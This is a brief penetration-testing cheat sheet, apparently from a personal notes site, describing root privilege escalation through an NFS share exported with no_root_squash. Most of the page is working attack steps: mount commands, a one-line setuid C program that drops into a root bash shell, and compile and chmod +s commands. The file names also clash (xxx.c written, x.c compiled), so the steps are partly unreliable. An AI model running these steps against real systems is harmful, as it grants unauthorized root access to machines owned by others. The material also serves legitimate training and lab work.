NFS Root Squash

Pre-Reqs:

NFS Share
No root squash

Local Check:

cat /etc/exports

Exploitation:

Mount in kali

showmount -e $IP
mkdir /tmp/folder/to/mount
mount -o rw,vers=2 $IP:/$RemoteShare /tmp/folder/to/mount

Make the setuid binary script and compile

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/folder/to/mount/xxx.c
gcc /tmp/folder/to/mount/x.c -o /tmp/folder/to/mount/xxx
chmod +s /tmp/folder/to/mount/xxx

Run the binary from the folder in the victim machine

/tmp/xxx

$PROFIT$
For issues check this post: https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html

PreviousOutdated Bash NextResources

Last updated 3 years ago